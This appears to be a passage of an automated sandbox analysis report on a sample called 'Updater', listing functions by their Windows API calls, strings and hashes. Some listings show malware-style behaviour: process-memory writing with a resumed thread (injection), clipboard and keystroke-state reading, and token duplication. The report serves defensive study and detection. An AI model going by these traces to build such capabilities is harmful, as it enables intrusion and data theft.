Opcode ID: 1b60810f2bbae1caab6052a0796777a4192423ebeefde8582b197da017e1d274
Instruction ID: 70bc5fff166b1d2e8e0528802523f6cbd0f47d779a8411c6bef712fce5294404
Opcode Fuzzy Hash: 1b60810f2bbae1caab6052a0796777a4192423ebeefde8582b197da017e1d274
Instruction Fuzzy Hash: 6BF04970A04609EFE701EBA6D881ADDB7FCEB78310FA2407FA504D3670DB749E618A50

Function 014B6514 Relevance: 1.3, APIs: 1, Instructions: 38sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 014B6409: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,014B648D), ref: 014B644E
Part of subcall function 014B6409: WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,014B648D), ref: 014B6466
Part of subcall function 014B6409: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,014B648D), ref: 014B6472

Sleep.KERNEL32(00000002,00000000,014B650E), ref: 014B64EE

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: File$CloseCreateHandleSleepWrite
String ID:
API String ID: 1443029356-0
Opcode ID: 589b78c4b59436a8f651b027469a4d63d3ba68fe4a104665fe6222392eddf0be
Instruction ID: 9f23b0a86aaf8ee5de3a8d081d5300d6117a314b5c8ce6c50611625af7c695e5
Opcode Fuzzy Hash: 589b78c4b59436a8f651b027469a4d63d3ba68fe4a104665fe6222392eddf0be
Instruction Fuzzy Hash: A7F04970604509EFE701DBA6D4916DDB7F9EB78300FA2447FE404D3670D7749E618A10

Function 014C4569 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2238771515.00000000014BF000.00000040.00000020.00020000.00000000.sdmp, Offset: 014BF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_14bf000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
Instruction ID: 67378a7150f3be02058e3c94d288c1121e178886b66468af1df8f5dec15916ab
Opcode Fuzzy Hash: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
Instruction Fuzzy Hash: E0313B29304602EAEF518A6CCE20B937B5CBF11B74F0C031FE55D936A5E7389551C7A5

Non-executed Functions

Function 0076525A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 576windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00765969

Strings

%d/%02d/%02d, xrefs: 00765699

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 213164796b2937225aff24e40d70bbd31b52263703cc370783e2fa0853b5689b
Instruction ID: ab3e464a37e43840f6edaebaa731877652e5190e98f718cd8389c1f964a7a1c6
Opcode Fuzzy Hash: 213164796b2937225aff24e40d70bbd31b52263703cc370783e2fa0853b5689b
Instruction Fuzzy Hash: 8512E071A00714EBEB248F29CC49FAE7BA4EF45750F10821AF917EB2D1DBB89941DB14

Function 0073230F Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 007327D9: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00732823
Part of subcall function 007327D9: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00732850
Part of subcall function 007327D9: GetLastError.KERNEL32 ref: 00732860

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00732394
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 007323B6
CloseHandle.KERNEL32(?), ref: 007323C7
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007323DF
GetProcessWindowStation.USER32 ref: 007323F8
SetProcessWindowStation.USER32(00000000), ref: 00732402
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0073241E

Part of subcall function 007321C9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00732308), ref: 007321DE
Part of subcall function 007321C9: CloseHandle.KERNEL32(?,?,00732308), ref: 007321F3

Strings

default, xrefs: 00732419
, xrefs: 00732368
4iy, xrefs: 007324A0
winsta0, xrefs: 007323DA

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $4iy$default$winsta0
API String ID: 22674027-2664196769
Opcode ID: 807ff6edaa1ded4dfe6ea68ff1326f3da8afd8681b7d0a2f21665e888f5fbddd
Instruction ID: e00ea44080d21bc41e567df70f45721ba8479a5a16b6c46e7d7812b5c84709a0
Opcode Fuzzy Hash: 807ff6edaa1ded4dfe6ea68ff1326f3da8afd8681b7d0a2f21665e888f5fbddd
Instruction Fuzzy Hash: 9D81C4B1A00309AFEF209FA4DC09FEE7BB8EF04300F144059F911A61A2C7798E56CB64

Function 0074F664 Relevance: 30.2, APIs: 20, Instructions: 189clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0074F68E
IsClipboardFormatAvailable.USER32(0000000D), ref: 0074F69C
GetClipboardData.USER32(0000000D), ref: 0074F6A8
CloseClipboard.USER32 ref: 0074F6B4
GlobalLock.KERNEL32(00000000), ref: 0074F6EC
CloseClipboard.USER32 ref: 0074F6F6
GlobalUnlock.KERNEL32(00000000), ref: 0074F721
IsClipboardFormatAvailable.USER32(00000001), ref: 0074F72E
GetClipboardData.USER32(00000001), ref: 0074F736
GlobalLock.KERNEL32(00000000), ref: 0074F747
GlobalUnlock.KERNEL32(00000000), ref: 0074F787
IsClipboardFormatAvailable.USER32(0000000F), ref: 0074F79D
GetClipboardData.USER32(0000000F), ref: 0074F7A9
GlobalLock.KERNEL32(00000000), ref: 0074F7BA
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0074F7DC
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0074F7F9
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0074F837
GlobalUnlock.KERNEL32(00000000), ref: 0074F858
CountClipboardFormats.USER32 ref: 0074F879
CloseClipboard.USER32 ref: 0074F8C2

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: de681eb69b05df11f737aa839dbe39b6e75b82561180a0b5f6e27d88a580c49e
Instruction ID: ec94b9af055d988902c407eea4f3a782a9f43b4028f74cb5c5545ba342fad84f
Opcode Fuzzy Hash: de681eb69b05df11f737aa839dbe39b6e75b82561180a0b5f6e27d88a580c49e
Instruction Fuzzy Hash: C161E2356043419FD320EF24D898F2A77A8EF44744F45842DF8578B2A2CB79EE45CB66

Function 006ED37F Relevance: 26.7, Strings: 17, Instructions: 5408COMMON

Download Yara Rule

Strings

, xrefs: 006ED4B8
+, xrefs: 006ED45E
!, xrefs: 006ED47C
{, xrefs: 006ED468
[:>:]], xrefs: 006EDA92
9, xrefs: 006ED49A
", xrefs: 0072C10D
Q\E, xrefs: 0072CB80
[:<:]], xrefs: 006EDA7C
', xrefs: 006ED4AE
0, xrefs: 006ED490
\b(?=\w), xrefs: 0072CB35
DEFINE, xrefs: 0072B15B
\b(?<=\w), xrefs: 0072CB3C
:, xrefs: 006ED472
<, xrefs: 006ED4A4
], xrefs: 006ED4F4

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID:
String ID: $!$"$'$+$0$9$:$<$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$]${
API String ID: 0-2815329305
Opcode ID: 860d9e7d99053ab5b0f9b4b54acce17a7dcde4efa3f89d19b7add5ef53170963
Instruction ID: 9ea481796f25b81601c61210f81ac5300c63d680ea055607657744c317e6a358
Opcode Fuzzy Hash: 860d9e7d99053ab5b0f9b4b54acce17a7dcde4efa3f89d19b7add5ef53170963
Instruction Fuzzy Hash: 03A3A075E00229DFDB24CF58D881AADB7B1FF58710F25816AE945EB381E7789E81CB40

Function 014A17FD Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 014A181A
GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 014A182B
lstrcpyn.KERNEL32(?,?,?,?,?,kernel32.dll), ref: 014A185F
lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 014A18D0
lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll), ref: 014A190B
FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll), ref: 014A191E
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 014A192B
lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 014A1937
lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 014A196B
lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 014A1977
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 014A19A0

Strings

\, xrefs: 014A1949
GetLongPathNameA, xrefs: 014A1825
kernel32.dll, xrefs: 014A1815

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 496b4e9fb2eb3bc482d289fef6ce8af0b5713fc394ebb54f55ee8745dfb9fe98
Instruction ID: 7520b75cb96a7e0270e10de9da964251d86ce393b6feb070eb47931511b522db
Opcode Fuzzy Hash: 496b4e9fb2eb3bc482d289fef6ce8af0b5713fc394ebb54f55ee8745dfb9fe98
Instruction Fuzzy Hash: D7515AB1E00259EFEB01DFE9CC84AEEBBBCAF64300F5505ABA554E7260D7349A44CB50

Function 0074A187 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0074A1A8
GetFileAttributesW.KERNEL32(?), ref: 0074A1E6
SetFileAttributesW.KERNEL32(?,?), ref: 0074A200
FindNextFileW.KERNEL32(00000000,?), ref: 0074A218
FindClose.KERNEL32(00000000), ref: 0074A223
FindFirstFileW.KERNEL32(*.*,?), ref: 0074A23F
SetCurrentDirectoryW.KERNEL32(?), ref: 0074A28F
SetCurrentDirectoryW.KERNEL32(007979A0), ref: 0074A2AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 0074A2B7
FindClose.KERNEL32(00000000), ref: 0074A2C4
FindClose.KERNEL32(00000000), ref: 0074A2D6

Strings

*.*, xrefs: 0074A23A

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 37fe8860048e5d4353cadfcfd71e60a83ab8077cf5f102b458d8da4cef50a669
Instruction ID: 5128f99db93bb82a595a7e72bde92ccd3a11479511adf50de3e76cce607fc457
Opcode Fuzzy Hash: 37fe8860048e5d4353cadfcfd71e60a83ab8077cf5f102b458d8da4cef50a669
Instruction Fuzzy Hash: DE310332A4121D7EDF249FA4DC48AEE73ACFF49320F000155E915E2190EBB9EE449A69

Function 006ECBF0 Relevance: 19.6, Strings: 15, Instructions: 876COMMON

Download Yara Rule

Strings

ANY), xrefs: 0072A117
BSR_UNICODE), xrefs: 0072A173
BSR_ANYCRLF), xrefs: 0072A159
LIMIT_MATCH=, xrefs: 00729FA3
LF), xrefs: 0072A0DD
NO_START_OPT), xrefs: 00729F82
UTF), xrefs: 00729F2D
x, xrefs: 006ECC5E
UTF16), xrefs: 00729F02
ANYCRLF), xrefs: 0072A134
UCP), xrefs: 00729F40
NO_AUTO_POSSESS), xrefs: 00729F61
CR), xrefs: 0072A0C0
LIMIT_RECURSION=, xrefs: 0072A03E
CRLF), xrefs: 0072A0FA

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$x
API String ID: 0-3146507942
Opcode ID: bee785910772ae841e93bc0ea07327f336792146bb7e713a970b244ef41f4b86
Instruction ID: 94e6a3cfa957d3d09ee12dbe810fccf7b3bd5d599b83ee16349cac02e6feece3
Opcode Fuzzy Hash: bee785910772ae841e93bc0ea07327f336792146bb7e713a970b244ef41f4b86
Instruction Fuzzy Hash: B4728271E00369DBDB14CF59D8417AEB7B6FF44310F14816AE909EB281EB789E81CB91

Function 00748C58 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 189timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00748D1A
SystemTimeToFileTime.KERNEL32(?,?), ref: 00748D2A
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00748D36
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00748DD3
SetCurrentDirectoryW.KERNEL32(?), ref: 00748DE7
GetFileAttributesW.KERNEL32(?), ref: 00748DF2
SetCurrentDirectoryW.KERNEL32(?), ref: 00748E20
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00748E56
SetCurrentDirectoryW.KERNEL32(?), ref: 00748E5F

Strings

*.*, xrefs: 00748E65

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$AttributesSystem
String ID: *.*
API String ID: 2554310696-438819550
Opcode ID: 9209592082ea1a31af6fdbd23cd01e7be8651ee236695e524927d6f3c72a27d1
Instruction ID: 1a51883c14f86d97130246eb73680129870bd17b0764d155106a7b786c11599b
Opcode Fuzzy Hash: 9209592082ea1a31af6fdbd23cd01e7be8651ee236695e524927d6f3c72a27d1
Instruction Fuzzy Hash: 90617B71A04319AFC750EF24C8849AEB3E9FF88310F04891EF99983251DB39EA45CB56

Function 014B9051 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 176sleepprocessnativeCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,014B9297), ref: 014B90B9
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 014B9186
NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 014B919E
ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 014B91C6
ReadProcessMemory.KERNEL32(?,?,?,00001000,?,?,?,?,00000004,?,00000000,00000000,00000000,00000000,00000000,00000004), ref: 014B91F5
WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 014B9247
ResumeThread.KERNEL32(?,?,?,00000000,00000000,?), ref: 014B9250
Sleep.KERNEL32(000001F4,?,?,?,00000000,00000000,?), ref: 014B925A
GetTickCount.KERNEL32 ref: 014B925F

Strings

D, xrefs: 014B9152

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: Process$Memory$Read$CountCreateCurrentInformationQueryResumeSleepThreadTickWrite
String ID: D
API String ID: 4190092080-2746444292
Opcode ID: b531c5f182683272547d8f31d51ba4c2015977fb88a374802bcd5e434c887b7e
Instruction ID: 2490aa8e639a5b4ddff1e691e7172e9e7e32d0c4ba323a399b34d065eb876841
Opcode Fuzzy Hash: b531c5f182683272547d8f31d51ba4c2015977fb88a374802bcd5e434c887b7e
Instruction Fuzzy Hash: 6D61EC75E0010D9FDB10EBA9DC91EDEB7BCAF28310F95406AF248E7250D774AA858B60

Function 0074A2E4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0074A305
FindNextFileW.KERNEL32(00000000,?), ref: 0074A360
FindClose.KERNEL32(00000000), ref: 0074A36B
FindFirstFileW.KERNEL32(*.*,?), ref: 0074A387
SetCurrentDirectoryW.KERNEL32(?), ref: 0074A3D7
SetCurrentDirectoryW.KERNEL32(007979A0), ref: 0074A3F5
FindNextFileW.KERNEL32(00000000,00000010), ref: 0074A3FF
FindClose.KERNEL32(00000000), ref: 0074A40C
FindClose.KERNEL32(00000000), ref: 0074A41E

Part of subcall function 0073E8E1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0073E8FC

Strings

*.*, xrefs: 0074A382

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 01a657c70d0f56504a83cc5d8c1e2de864d2becc4d908085ab4373e7c78849d0
Instruction ID: 7c81a141290f8cbff3105c22a48fea48f9d428ba00fe134424ebbc9fa1e0d043
Opcode Fuzzy Hash: 01a657c70d0f56504a83cc5d8c1e2de864d2becc4d908085ab4373e7c78849d0
Instruction Fuzzy Hash: DC31077164035DBACF24AFA8EC48ADE776CEF05320F140165F915A3190E778EE858A59

Function 0075C844 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0075D398: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0075C0AE,?,?), ref: 0075D3B5

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0075C93E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0075C9A9
RegCloseKey.ADVAPI32(00000000), ref: 0075C9CD
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0075CA2C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0075CAE7
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0075CB54
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0075CBE9
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0075CC3A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0075CCE3
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0075CD82
RegCloseKey.ADVAPI32(00000000), ref: 0075CD8F

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3218304859-0
Opcode ID: 8f4ccb507b54819ec57c4c9bd202c386a270015e2c84a83bf8cdb1a95edc2ef1
Instruction ID: 87e07684cc93852fb0699c2ad5b4c1379f9028221b254e8382b8f1f4fe003f3a
Opcode Fuzzy Hash: 8f4ccb507b54819ec57c4c9bd202c386a270015e2c84a83bf8cdb1a95edc2ef1
Instruction Fuzzy Hash: AA026A71604300AFD715CF28C895F6ABBE5AF49304F0884ADF84ACB2A2DB75ED46CB51

Function 0073AA95 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0073AABD
GetAsyncKeyState.USER32(000000A0), ref: 0073AB3E
GetKeyState.USER32(000000A0), ref: 0073AB59
GetAsyncKeyState.USER32(000000A1), ref: 0073AB73
GetKeyState.USER32(000000A1), ref: 0073AB88
GetAsyncKeyState.USER32(00000011), ref: 0073ABA0
GetKeyState.USER32(00000011), ref: 0073ABB2
GetAsyncKeyState.USER32(00000012), ref: 0073ABCA
GetKeyState.USER32(00000012), ref: 0073ABDC
GetAsyncKeyState.USER32(0000005B), ref: 0073ABF4
GetKeyState.USER32(0000005B), ref: 0073AC06

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 52f8a43cfdd59fd24b11383846b5f2a9822a6e3d5afe23b15cfe57fc7c8baf39
Instruction ID: d095f983f3d722d8c979719526491d57191fe7864139c7b078b82dca717b707d
Opcode Fuzzy Hash: 52f8a43cfdd59fd24b11383846b5f2a9822a6e3d5afe23b15cfe57fc7c8baf39
Instruction Fuzzy Hash: 6D41B360A047CA7EFF358B6489067A5FAA1AB11304F08805AD5C7465C3EBEC9DD4CB63

Function 00747591 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 286timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007475BD
FindClose.KERNEL32(00000000), ref: 0074760E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0074763A
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00747651

Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45

FileTimeToSystemTime.KERNEL32(?,?), ref: 00747678

Strings

%02d, xrefs: 0074774C, 00747756, 007477A4, 007477F3, 00747842, 00747891
%4d%02d%02d%02d%02d%02d, xrefs: 007476BE
%4d, xrefs: 007476FE

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: FileTime$FindLocal$CloseFirstSystem_wcslen
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 409396820-2428617273
